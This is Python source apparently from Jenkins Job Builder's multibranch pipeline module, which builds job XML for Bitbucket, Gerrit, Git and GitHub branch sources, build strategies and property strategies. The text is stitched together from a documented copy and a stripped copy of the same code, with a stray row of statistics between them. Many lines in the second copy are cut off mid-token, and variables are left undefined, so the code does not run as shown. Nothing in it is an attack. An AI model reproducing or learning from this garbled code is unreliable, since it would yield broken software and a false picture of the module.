'plugin': 'git',
}
)
templates = XML.SubElement(refspec_trait, 'templates')
refspecs = data.get('refspecs', [
'+refs/changes/*:refs/remotes/@{remote}/*',
'+refs/heads/*:refs/remotes/@{remote}/*',
])
# convert single string to list
if isinstance(refspecs, six.string_types):
refspecs = [refspecs]
for x in refspecs:
e = XML.SubElement(
templates, ('jenkins.plugins.git.traits'
'.RefSpecsSCMSourceTrait_-RefSpecTemplate'))
XML.SubElement(e, 'value').text = x
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
def git_scm(xml_parent, data):
r"""Configure Git SCM
Requires the :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg str url: The git repo url. (required)
:arg str credentials-id: The credential to use to connect to the GIT repo.
(default '')
:arg bool discover-branches: Discovers branches on the repository.
(default true)
:arg bool discover-tags: Discovers tags on the repository.
(default false)
:arg bool ignore-on-push-notifications: If a job should not trigger upon
push notifications. (default false)
:arg str head-filter-regex: A regular expression for filtering
discovered source branches. Requires the :jenkins-wiki:`SCM API Plugin
<SCM+API+Plugin>`.
:arg list build-strategies: Provides control over whether to build a branch
(or branch like things such as change requests and tags) whenever it is
discovered initially or a change from the previous revision has been
detected. (optional)
Refer to :func:`~build_strategies <build_strategies>`.
:arg dict property-strategies: Provides control over how to build a branch
(like to disable SCM triggering or to override the pipeline durability)
(optional)
Refer to :func:`~property_strategies <property_strategies>`.
:extensions:
* **clean** (`dict`)
* **after** (`bool`) - Clean the workspace after checkout
* **before** (`bool`) - Clean the workspace before checkout
* **prune** (`bool`) - Prune remote branches (default false)
* **shallow-clone** (`bool`) - Perform shallow clone (default false)
* **depth** (`int`) - Set shallow clone depth (default 1)
* **do-not-fetch-tags** (`bool`) - Perform a clone without tags
(default false)
* **submodule** (`dict`)
* **disable** (`bool`) - By disabling support for submodules you
can still keep using basic git plugin functionality and just have
Jenkins to ignore submodules completely as if they didn't exist.
* **recursive** (`bool`) - Retrieve all submodules recursively
(uses '--recursive' option which requires git>=1.6.5)
* **tracking** (`bool`) - Retrieve the tip of the configured
branch in .gitmodules (Uses '\-\-remote' option which requires
git>=1.8.2)
* **parent-credentials** (`bool`) - Use credentials from default
remote of parent repository (default false).
* **reference-repo** (`str`) - Path of the reference repo to use
during clone (optional)
* **timeout** (`int`) - Specify a timeout (in minutes) for
submodules operations (default 10).
* **timeout** (`str`) - Timeout for git commands in minutes (optional)
* **use-author** (`bool`): Use author rather than committer in Jenkin's
build changeset (default false)
* **wipe-workspace** (`bool`) - Wipe out workspace before build
(default true)
Minimal Example:
.. literalinclude:: /../../tests/multibranch/fixtures/scm_git_minimal.yaml
Full Example:
.. literalinclude:: /../../tests/multibranch/fixtures/scm_git_full.yaml
"""
source = XML.SubElement(xml_parent, 'source', {
'class': 'jenkins.plugins.git.GitSCMSource',
'plugin': 'git',
})
source_mapping = [
('', 'id', '-'.join(['gt', data.get('url', '')])),
('url', 'remote', None),
('credentials-id', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
##########
# Traits #
##########
traits_path = 'jenkins.plugins.git.traits'
traits = XML.SubElement(source, 'traits')
if data.get('discover-branches', True):
XML.SubElement(traits, ''.join([traits_path, '.BranchDiscoveryTrait']))
if data.get('discover-tags', False):
XML.SubElement(traits, ''.join([traits_path, '.TagDiscoveryTrait']))
if data.get('ignore-on-push-notifications', False):
XML.SubElement(
traits, ''.join([traits_path, '.IgnoreOnPushNotificationTrait']))
if data.get('head-filter-regex', None):
rshf = XML.SubElement(traits,
'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
# handle the default git extensions like:
# - clean
# - shallow-clone
# - timeout
# - do-not-fetch-tags
# - submodule
# - prune
# - wipe-workspace
# - use-author
git_extensions(traits, data)
def github_scm(xml_parent, data):
r"""Configure GitHub SCM
Requires the :jenkins-wiki:`GitHub Branch Source Plugin
<GitHub+Branch+Source+Plugin>`.
:arg str api-uri: The GitHub API uri for hosted / on-site GitHub. Must
first be configured in Global Configuration. (default GitHub)
:arg bool ssh-checkout: Checkout over SSH.
* **credentials** ('str'): Credentials to use for
checkout of the repo over ssh.
:arg str credentials-id: Credentials used to scan branches and pull
requests, check out sources and mark commit statuses. (optional)
:arg str repo-owner: Specify the name of the GitHub Organization or
GitHub User Account. (required)
:arg str repo: The GitHub repo. (required)
:arg str branch-discovery: Discovers branches on the repository.
Valid options: no-pr, only-pr, all, false. (default 'no-pr')
:arg str discover-pr-forks-strategy: Fork strategy. Valid options:
merge-current, current, both, false. (default 'merge-current')
:arg str discover-pr-forks-trust: Discovers pull requests where the origin
repository is a fork of the target repository.
Valid options: contributors, everyone, permission or nobody.
(default 'contributors')
:arg str discover-pr-origin: Discovers pull requests where the origin
repository is the same as the target repository.
Valid options: merge-current, current, both. (default 'merge-current')
:arg bool discover-tags: Discovers tags on the repository.
(default false)
:arg list build-strategies: Provides control over whether to build a branch
(or branch like things such as change requests and tags) whenever it is
discovered initially or a change from the previous revision has been
detected. (optional)
Refer to :func:`~build_strategies <build_strategies>`.
:arg dict property-strategies: Provides control over how to build a branch
(like to disable SCM triggering or to override the pipeline durability)
(optional)
Refer to :func:`~property_strategies <property_strategies>`.
:extensions:
* **clean** (`dict`)
* **after** (`bool`) - Clean the workspace after checkout
* **before** (`bool`) - Clean the workspace before checkout
* **prune** (`bool`) - Prune remote branches (default false)
* **shallow-clone** (`bool`) - Perform shallow clone (default false)
* **depth** (`int`) - Set shallow clone depth (default 1)
* **do-not-fetch-tags** (`bool`) - Perform a clone without tags
(default false)
* **disable-pr-notifications** (`bool`) - Disable default github status
notifications on pull requests (default false) (Requires the
:jenkins-plugins:`GitHub Branch Source Plugin
<disable-github-multibranch-status>`.)
* **submodule** (`dict`)
* **disable** (`bool`) - By disabling support for submodules you
can still keep using basic git plugin functionality and just have
Jenkins to ignore submodules completely as if they didn't exist.
* **recursive** (`bool`) - Retrieve all submodules recursively
(uses '--recursive' option which requires git>=1.6.5)
* **tracking** (`bool`) - Retrieve the tip of the configured
branch in .gitmodules (Uses '\-\-remote' option which requires
git>=1.8.2)
* **parent-credentials** (`bool`) - Use credentials from default
remote of parent repository (default false).
* **reference-repo** (`str`) - Path of the reference repo to use
during clone (optional)
* **timeout** (`int`) - Specify a timeout (in minutes) for
submodules operations (default 10).
* **timeout** (`str`) - Timeout for git commands in minutes (optional)
* **use-author** (`bool`): Use author rather than committer in Jenkin's
build changeset (default false)
* **wipe-workspace** (`bool`) - Wipe out workspace before build
(default true)
Minimal Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_github_minimal.yaml
Full Example:
.. literalinclude::
/../../tests/multibranch/fixtures/scm_github_full.yaml
"""
github_path = 'org.jenkinsci.plugins.github_branch_source'
github_path_dscore = 'org.jenkinsci.plugins.github__branch__source'
source = XML.SubElement(xml_parent, 'source', {
'class': ''.join([github_path, '.GitHubSCMSource']),
'plugin': 'github-branch-source',
})
mapping = [
('', 'id', '-'.join(['gh', data.get('repo-owner', ''),
data.get('repo', '')])),
('repo-owner', 'repoOwner', None),
('repo', 'repository', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping, fail_required=True)
mapping_optional = [
('api-uri', 'apiUri', None),
('credentials-id', 'credentialsId', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping_optional, fail_required=False)
traits = XML.SubElement(source, 'traits')
# no-pr value is assumed if branch-discovery not mentioned.
if data.get('branch-discovery', 'no-pr'):
bd = XML.SubElement(traits, ''.join([
github_path_dscore, '.BranchDiscoveryTrait']))
bd_strategy = {
'no-pr': '1',
'only-pr': '2',
'all': '3',
}
bd_mapping = [
('branch-discovery', 'strategyId', 'no-pr', bd_strategy)
]
helpers.convert_mapping_to_xml(
bd, data, bd_mapping, fail_required=True)
if data.get('ssh-checkout', None):
cossh = XML.SubElement(
traits, ''.join([
github_path_dscore, '.SSHCheckoutTrait'
])
)
if not isinstance(data.get('ssh-checkout'), bool):
cossh_credentials = [
('credentials', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
cossh,
data.get('ssh-checkout'),
cossh_credentials,
fail_required=True)
if data.get('discover-tags', False):
XML.SubElement(
traits, ''.join([
github_path_dscore, '.TagDiscoveryTrait'
])
)
if data.get('discover-pr-forks-strategy', 'merged-current'):
dprf = XML.SubElement(
traits, ''.join([
github_path_dscore, '.ForkPullRequestDiscoveryTrait'
])
)
dprf_strategy = {
'merge-current': '1',
'current': '2',
'both': '3',
}
dprf_mapping = [
('discover-pr-forks-strategy', 'strategyId', 'merge-current',
dprf_strategy)
]
helpers.convert_mapping_to_xml(
dprf, data, dprf_mapping, fail_required=True)
trust = data.get('discover-pr-forks-trust', 'contributors')
trust_map = {
'contributors': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustContributors']),
'everyone': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustEveryone']),
'permission': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustPermission']),
'nobody': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustNobody']),
}
if trust not in trust_map:
raise InvalidAttributeError('discover-pr-forks-trust',
trust,
trust_map.keys())
XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
dpro_strategy = data.get('discover-pr-origin', 'merge-current')
dpro = XML.SubElement(traits, ''.join([
github_path_dscore,
'.OriginPullRequestDiscoveryTrait'
]))
dpro_strategy_map = {
'merge-current': '1',
'current': '2',
'both': '3',
}
if dpro_strategy not in dpro_strategy_map:
raise InvalidAttributeError('discover-pr-origin',
dpro_strategy,
dpro_strategy_map.keys())
dpro_mapping = [
('discover-pr-origin', 'strategyId', 'merge-current',
dpro_strategy_map)
]
helpers.convert_mapping_to_xml(
dpro, data, dpro_mapping, fail_required=True)
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
# handle the default git extensions like:
# - clean
# - shallow-clone
# - timeout
# - do-not-fetch-tags
# - submodule
# - prune
# - wipe-workspace
# - use-author
git_extensions(traits, data)
# github-only extensions
disable_github_status_path_dscore = (
'com.adobe.jenkins.disable__github__multibranch__status')
if data.get('disable-pr-notifications', False):
XML.SubElement(
traits, ''.join([
disable_github_status_path_dscore, '.DisableStatusUpdateTrait'
]), {
'plugin': 'disable-github-multibranch-status'
}
)
def build_strategies(xml_parent, data):
"""Configure Basic Branch Build Strategies.
Requires the :jenkins-wiki:`Basic Branch Build Strategies Plugin
<Basic+Branch+Build+Strategies+Plugin>`.
:arg list build-strategies: Definition of build strategies.
* **tags** (dict): Builds tags
* **ignore-tags-newer-than** (int) The number of days since the tag
was created before it is eligible for automatic building.
(optional, default -1)
* **ignore-tags-older-than** (int) The number of days since the tag
was created after which it is no longer eligible for automatic
building. (optional, default -1)
* **change-request** (dict): Builds change requests / pull requests
* **ignore-target-only-changes** (bool) Ignore rebuilding merge
branches when only the target branch changed.
(optional, default false)
* **regular-branches** (bool): Builds regular branches whenever a
change is detected. (optional, default None)
* **named-branches** (list): Builds named branches whenever a change
is detected.
* **exact-name** (dict) Matches the name verbatim.
* **name** (str) The name to match. (optional)
* **case-sensitive** (bool) Check this box if the name should
be matched case sensitively. (default false)
* **regex-name** (dict) Matches the name against a regular
expression.
* **regex** (str) A Java regular expression to restrict the
names. Names that do not match the supplied regular
expression will be ignored. (default `^.*$`)
* **case-sensitive** (bool) Check this box if the name should
be matched case sensitively. (default false)
* **wildcards-name** (dict) Matches the name against an
include/exclude set of wildcards.
* **includes** (str) Space-separated list of name patterns to
consider. You may use `*` as a wildcard;
for example: `master release*` (default `*`)
* **excludes** (str) Name patterns to ignore even if matched
by the includes list. For example: release (optional)
"""
basic_build_strategies = 'jenkins.branch.buildstrategies.basic'
bbs = XML.SubElement(xml_parent, 'buildStrategies')
for bbs_list in data.get('build-strategies', None):
if 'tags' in bbs_list:
tags = bbs_list['tags']
tags_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
'.TagBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
newer_than = -1
if ('ignore-tags-newer-than' in tags and
tags['ignore-tags-newer-than'] >= 0):
newer_than = str(tags['ignore-tags-newer-than'] * 86400000)
XML.SubElement(tags_elem, 'atMostMillis').text = str(newer_than)
older_than = -1
if ('ignore-tags-older-than' in tags and
tags['ignore-tags-older-than'] >= 0):
older_than = str(tags['ignore-tags-older-than'] * 86400000)
XML.SubElement(tags_elem, 'atLeastMillis').text = str(older_than)
if bbs_list.get('regular-branches', False):
XML.SubElement(bbs, ''.join([basic_build_strategies,
'.BranchBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
if 'change-request' in bbs_list:
cr = bbs_list['change-request']
cr_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
'.ChangeRequestBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
itoc = cr.get('ignore-target-only-changes', False)
XML.SubElement(cr_elem, 'ignoreTargetOnlyChanges').text = (
str(itoc).lower())
if 'named-branches' in bbs_list:
named_branch_elem = XML.SubElement(bbs, ''.join(
[basic_build_strategies, '.NamedBranchBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
filters = XML.SubElement(named_branch_elem, 'filters')
for nb in bbs_list['named-branches']:
if 'exact-name' in nb:
exact_name_elem = XML.SubElement(filters, ''.join(
[basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-ExactNameFilter']))
exact_name_mapping = [
('name', 'name', ''),
('case-sensitive', 'caseSensitive', False)
]
helpers.convert_mapping_to_xml(
exact_name_elem,
nb['exact-name'],
exact_name_mapping,
fail_required=False)
if 'regex-name' in nb:
regex_name_elem = XML.SubElement(filters, ''.join([
basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-RegexNameFilter']))
regex_name_mapping = [
('regex', 'regex', '^.*$'),
('case-sensitive', 'caseSensitive', False)
]
helpers.convert_mapping_to_xml(
regex_name_elem, nb['regex-name'],
regex_name_mapping, fail_required=False)
if 'wildcards-name' in nb:
wildcards_name_elem = XML.SubElement(filters, ''.join([
basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-WildcardsNameFilter']))
wildcards_name_mapping = [
('includes', 'includes', '*'),
('excludes', 'excludes', '')
]
helpers.convert_mapping_to_xml(
wildcards_name_elem,
nb['wildcards-name'],
wildcards_name_mapping,
fail_required=False)
def property_strategies(xml_parent, data):
"""Configure Basic Branch Property Strategies.
Requires the :jenkins-wiki:`Branch API Plugin <Branch+API+Plugin>`.
:arg dict property-strategies: Definition of property strategies.
* **all-branches** (list): A list of property strategy definitions
for use with all branches.
* **suppress-scm-triggering** (bool): Suppresses automatic SCM
triggering (optional)
* **pipeline-branch-durability-override** (str): Set a custom
branch speed/durability level. Valid values:
performance-optimized, survivable-nonatomic, or
max-survivability (optional) Requires the :jenkins-wiki:
`Pipeline Multibranch Plugin <Pipeline+Multibranch+Plugin>`
"""
# Valid options for the pipeline branch durability override.
pbdo_map = collections.OrderedDict([
("max-survivability", "MAX_SURVIVABILITY"),
("performance-optimized", "PERFORMANCE_OPTIMIZED"),
("survivable-nonatomic", "SURVIVABLE_NONATOMIC"),
])
basic_property_strategies = 'jenkins.branch'
workflow_multibranch = 'org.jenkinsci.plugins.workflow.multibranch'
dbps = XML.SubElement(xml_parent, 'strategy', {
'class': ''.join([basic_property_strategies,
'.DefaultBranchPropertyStrategy'])})
prop_strats = data.get('property-strategies', None)
if prop_strats:
props_elem = XML.SubElement(dbps, 'properties', {
'class': 'java.util.Arrays$ArrayList'})
props_elem = XML.SubElement(props_elem, 'a', {
'class': ''.join([
basic_property_strategies, '.BranchProperty-array'])})
for dbs_list in prop_strats.get('all-branches', None):
if dbs_list.get('suppress-scm-triggering', False):
XML.SubElement(props_elem, ''.join([
basic_property_strategies, '.NoTriggerBranchProperty']))
pbdo_val = dbs_list.get(
'pipeline-branch-durability-override', None)
if pbdo_val:
if not pbdo_map.get(pbdo_val):
raise InvalidAttributeError(
'pipeline-branch-durability-override',
pbdo_val,
pbdo_map.keys())
pbdo_elem = XML.SubElement(props_elem, ''.join([
workflow_multibranch, '.DurabilityHintBranchProperty']), {
'plugin': 'workflow-multibranch'})
XML.SubElement(pbdo_elem, 'hint').text = pbdo_map.get(pbdo_val)
| 39.701505 | 79 | 0.582609 |
import collections
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
import jenkins_jobs.modules.helpers as helpers
import six
from jenkins_jobs.modules.scm import git_extensions
from jenkins_jobs.errors import InvalidAttributeError
logger = logging.getLogger(str(__name__))
class WorkflowMultiBranch(jenkins_jobs.modules.base.Base):
sequence = 0
multibranch_path = 'org.jenkinsci.plugins.workflow.multibranch'
jenkins_class = ''.join([multibranch_path, '.WorkflowMultiBranchProject'])
jenkins_factory_class = ''.join(
[multibranch_path, '.WorkflowBranchProjectFactory'])
def root_xml(self, data):
xml_parent = XML.Element(self.jenkins_class)
xml_parent.attrib['plugin'] = 'workflow-multibranch'
XML.SubElement(xml_parent, 'properties')
all_view = XML.SubElement(views, 'hudson.model.AllView')
all_view_mapping = [
('', 'name', 'All'),
('', 'filterExecutors', False),
('', 'filterQueue', False),
]
helpers.convert_mapping_to_xml(
all_view, {}, all_view_mapping, fail_required=True)
XML.SubElement(all_view, 'properties', {
'class': 'hudson.model.View$PropertyList'
})
XML.SubElement(all_view, 'owner', {
'class': self.jenkins_class,
'reference': '../../..'
})
XML.SubElement(xml_parent, 'viewsTabBar', {
'class': 'hudson.views.DefaultViewsTabBar'
})
ner', {
'class': self.jenkins_class,
'reference': '../..'
})
ement(hm_plugin, 'nonRecursive').text = 'false'
ent, 'icon', {
'class': 'jenkins.branch.MetadataActionFolderIcon',
'plugin': 'branch-api',
})
XML.SubElement(icon, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
helpers.convert_mapping_to_xml(ois, data, ois_mapping)
("12h", ("H H * * *", '43200000')),
("1d", ("H H * * *", '86400000')),
("2d", ("H H * * *", '172800000')),
("1w", ("H H * * *", '604800000')),
("2w", ("H H * * *", '1209600000')),
("4w", ("H H * * *", '2419200000')),
])
pft_val = data.get('periodic-folder-trigger')
if pft_val:
if not pft_map.get(pft_val):
raise InvalidAttributeError(
'periodic-folder-trigger',
pft_val,
pft_map.keys())
pft_path = (
'com.cloudbees.hudson.plugins.folder.computed.'
'PeriodicFolderTrigger')
pft = XML.SubElement(triggers, pft_path, {
'plugin': 'cloudbees-folder'
})
XML.SubElement(pft, 'spec').text = pft_map[pft_val][0]
XML.SubElement(pft, 'interval').text = pft_map[pft_val][1]
nch.MultiBranchProject$BranchSourceList',
'plugin': 'branch-api',
})
sources_data = XML.SubElement(sources, 'data')
XML.SubElement(sources, 'owner', {
'class': self.jenkins_class,
'reference': '../..',
})
valid_scm = [
'bitbucket',
'gerrit',
'git',
'github',
]
for scm_data in data.get('scm', None):
for scm in scm_data:
bs = XML.SubElement(
sources_data, 'jenkins.branch.BranchSource')
if scm == 'bitbucket':
bitbucket_scm(bs, scm_data[scm])
elif scm == 'gerrit':
gerrit_scm(bs, scm_data[scm])
elif scm == 'git':
git_scm(bs, scm_data[scm])
elif scm == 'github':
github_scm(bs, scm_data[scm])
else:
raise InvalidAttributeError('scm', scm_data, valid_scm)
_factory_class,
})
XML.SubElement(factory, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
XML.SubElement(factory, 'scriptPath').text = data.get(
'script-path', 'Jenkinsfile')
return xml_parent
class WorkflowMultiBranchDefaults(WorkflowMultiBranch):
jenkins_class = (
'org.jenkinsci.plugins.pipeline.multibranch'
'.defaults.PipelineMultiBranchDefaultsProject')
jenkins_factory_class = (
'org.jenkinsci.plugins.pipeline.multibranch'
'.defaults.PipelineBranchDefaultsProjectFactory')
def bitbucket_scm(xml_parent, data):
source = XML.SubElement(xml_parent, 'source', {
'class': 'com.cloudbees.jenkins.plugins.bitbucket.BitbucketSCMSource',
'plugin': 'cloudbees-bitbucket-branch-source',
})
source_mapping = [
('', 'id', '-'.join(['bb', data.get('repo-owner', ''),
data.get('repo', '')])),
('repo-owner', 'repoOwner', None),
('repo', 'repository', None),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
mapping_optional = [
('credentials-id', 'credentialsId', None),
('server-url', 'serverUrl', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping_optional, fail_required=False)
traits = XML.SubElement(source, 'traits')
if data.get('discover-tags', False):
XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.TagDiscoveryTrait')
if data.get('head-filter-regex', None):
rshf = XML.SubElement(traits,
'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
if data.get('discover-pr-origin', None):
dpro = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket'
'.OriginPullRequestDiscoveryTrait')
dpro_strategies = {
'mergeOnly': '1',
'headOnly': '2',
'mergeAndHead': '3'
}
dpro_mapping = [
('discover-pr-origin', 'strategyId', None, dpro_strategies)
]
helpers.convert_mapping_to_xml(
dpro, data, dpro_mapping, fail_required=True)
if data.get('discover-pr-forks-strategy'):
dprf = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait')
dprf_strategy = {
'merge-current': '1',
'current': '2',
'both': '3',
}
dprf_mapping = [
('discover-pr-forks-strategy', 'strategyId', 'merge-current',
dprf_strategy)
]
helpers.convert_mapping_to_xml(
dprf, data, dprf_mapping, fail_required=True)
trust = data.get('discover-pr-forks-trust', 'contributors')
trust_map = {
'contributors': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustContributors']),
'everyone': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustEveryone']),
'permission': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustPermission']),
'nobody': ''.join([
'com.cloudbees.jenkins.plugins.bitbucket'
'.ForkPullRequestDiscoveryTrait$TrustNobody']),
}
if trust not in trust_map:
raise InvalidAttributeError('discover-pr-forks-trust',
trust,
trust_map.keys())
XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
if data.get('discover-branch', None):
dbr = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.BranchDiscoveryTrait')
dbr_strategies = {
'ex-pr': '1',
'only-pr': '2',
'all': '3'
}
dbr_mapping = [
('discover-branch', 'strategyId', None, dbr_strategies)
]
helpers.convert_mapping_to_xml(
dbr, data, dbr_mapping, fail_required=True)
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
if data.get('local-branch', False):
lbr = XML.SubElement(traits,
'jenkins.plugins.git.traits.LocalBranchTrait', {
'plugin': 'git',
}
)
lbr_extension = XML.SubElement(lbr,
'extension', {
'class': 'hudson.plugins.git.extensions.impl.LocalBranch',
}
)
XML.SubElement(lbr_extension,
'localBranch').text = "**"
if data.get('checkout-over-ssh', None):
cossh = XML.SubElement(traits,
'com.cloudbees.jenkins.plugins.bitbucket.SSHCheckoutTrait')
cossh_credentials = [
('credentials', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
cossh,
data.get('checkout-over-ssh'),
cossh_credentials,
fail_required=True)
if data.get('filter-by-name-wildcard', None):
wscmf_name = XML.SubElement(traits,
'jenkins.scm.impl.trait.WildcardSCMHeadFilterTrait', {
'plugin': 'scm-api',
}
)
wscmf_name_mapping = [
('includes', 'includes', ''),
('excludes', 'excludes', '')
]
helpers.convert_mapping_to_xml(
wscmf_name,
data.get('filter-by-name-wildcard', ''),
wscmf_name_mapping,
fail_required=True)
git_extensions(traits, data)
def gerrit_scm(xml_parent, data):
source = XML.SubElement(xml_parent, 'source', {
'class': 'jenkins.plugins.gerrit.GerritSCMSource',
'plugin': 'gerrit',
})
source_mapping = [
('', 'id', '-'.join(['gr', data.get('url', '')])),
('url', 'remote', None),
('credentials-id', 'credentialsId', ''),
('includes', 'includes', '*'),
('excludes', 'excludes', ''),
('ignore-on-push-notifications', 'ignoreOnPushNotifications', True),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
source_mapping_optional = [
('api-uri', 'apiUri', None),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping_optional, fail_required=False)
traits = XML.SubElement(source, 'traits')
XML.SubElement(traits,
'jenkins.plugins.gerrit.traits.ChangeDiscoveryTrait')
refspec_trait = XML.SubElement(
traits, 'jenkins.plugins.git.traits.RefSpecsSCMSourceTrait', {
'plugin': 'git',
}
)
templates = XML.SubElement(refspec_trait, 'templates')
refspecs = data.get('refspecs', [
'+refs/changes/*:refs/remotes/@{remote}/*',
'+refs/heads/*:refs/remotes/@{remote}/*',
])
if isinstance(refspecs, six.string_types):
refspecs = [refspecs]
for x in refspecs:
e = XML.SubElement(
templates, ('jenkins.plugins.git.traits'
'.RefSpecsSCMSourceTrait_-RefSpecTemplate'))
XML.SubElement(e, 'value').text = x
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
def git_scm(xml_parent, data):
source = XML.SubElement(xml_parent, 'source', {
'class': 'jenkins.plugins.git.GitSCMSource',
'plugin': 'git',
})
source_mapping = [
('', 'id', '-'.join(['gt', data.get('url', '')])),
('url', 'remote', None),
('credentials-id', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
ce, 'traits')
if data.get('discover-branches', True):
XML.SubElement(traits, ''.join([traits_path, '.BranchDiscoveryTrait']))
if data.get('discover-tags', False):
XML.SubElement(traits, ''.join([traits_path, '.TagDiscoveryTrait']))
if data.get('ignore-on-push-notifications', False):
XML.SubElement(
traits, ''.join([traits_path, '.IgnoreOnPushNotificationTrait']))
if data.get('head-filter-regex', None):
rshf = XML.SubElement(traits,
'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
git_extensions(traits, data)
def github_scm(xml_parent, data):
github_path = 'org.jenkinsci.plugins.github_branch_source'
github_path_dscore = 'org.jenkinsci.plugins.github__branch__source'
source = XML.SubElement(xml_parent, 'source', {
'class': ''.join([github_path, '.GitHubSCMSource']),
'plugin': 'github-branch-source',
})
mapping = [
('', 'id', '-'.join(['gh', data.get('repo-owner', ''),
data.get('repo', '')])),
('repo-owner', 'repoOwner', None),
('repo', 'repository', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping, fail_required=True)
mapping_optional = [
('api-uri', 'apiUri', None),
('credentials-id', 'credentialsId', None),
]
helpers.convert_mapping_to_xml(
source, data, mapping_optional, fail_required=False)
traits = XML.SubElement(source, 'traits')
if data.get('branch-discovery', 'no-pr'):
bd = XML.SubElement(traits, ''.join([
github_path_dscore, '.BranchDiscoveryTrait']))
bd_strategy = {
'no-pr': '1',
'only-pr': '2',
'all': '3',
}
bd_mapping = [
('branch-discovery', 'strategyId', 'no-pr', bd_strategy)
]
helpers.convert_mapping_to_xml(
bd, data, bd_mapping, fail_required=True)
if data.get('ssh-checkout', None):
cossh = XML.SubElement(
traits, ''.join([
github_path_dscore, '.SSHCheckoutTrait'
])
)
if not isinstance(data.get('ssh-checkout'), bool):
cossh_credentials = [
('credentials', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
cossh,
data.get('ssh-checkout'),
cossh_credentials,
fail_required=True)
if data.get('discover-tags', False):
XML.SubElement(
traits, ''.join([
github_path_dscore, '.TagDiscoveryTrait'
])
)
if data.get('discover-pr-forks-strategy', 'merged-current'):
dprf = XML.SubElement(
traits, ''.join([
github_path_dscore, '.ForkPullRequestDiscoveryTrait'
])
)
dprf_strategy = {
'merge-current': '1',
'current': '2',
'both': '3',
}
dprf_mapping = [
('discover-pr-forks-strategy', 'strategyId', 'merge-current',
dprf_strategy)
]
helpers.convert_mapping_to_xml(
dprf, data, dprf_mapping, fail_required=True)
trust = data.get('discover-pr-forks-trust', 'contributors')
trust_map = {
'contributors': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustContributors']),
'everyone': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustEveryone']),
'permission': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustPermission']),
'nobody': ''.join([
github_path,
'.ForkPullRequestDiscoveryTrait$TrustNobody']),
}
if trust not in trust_map:
raise InvalidAttributeError('discover-pr-forks-trust',
trust,
trust_map.keys())
XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
dpro_strategy = data.get('discover-pr-origin', 'merge-current')
dpro = XML.SubElement(traits, ''.join([
github_path_dscore,
'.OriginPullRequestDiscoveryTrait'
]))
dpro_strategy_map = {
'merge-current': '1',
'current': '2',
'both': '3',
}
if dpro_strategy not in dpro_strategy_map:
raise InvalidAttributeError('discover-pr-origin',
dpro_strategy,
dpro_strategy_map.keys())
dpro_mapping = [
('discover-pr-origin', 'strategyId', 'merge-current',
dpro_strategy_map)
]
helpers.convert_mapping_to_xml(
dpro, data, dpro_mapping, fail_required=True)
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
git_extensions(traits, data)
disable_github_status_path_dscore = (
'com.adobe.jenkins.disable__github__multibranch__status')
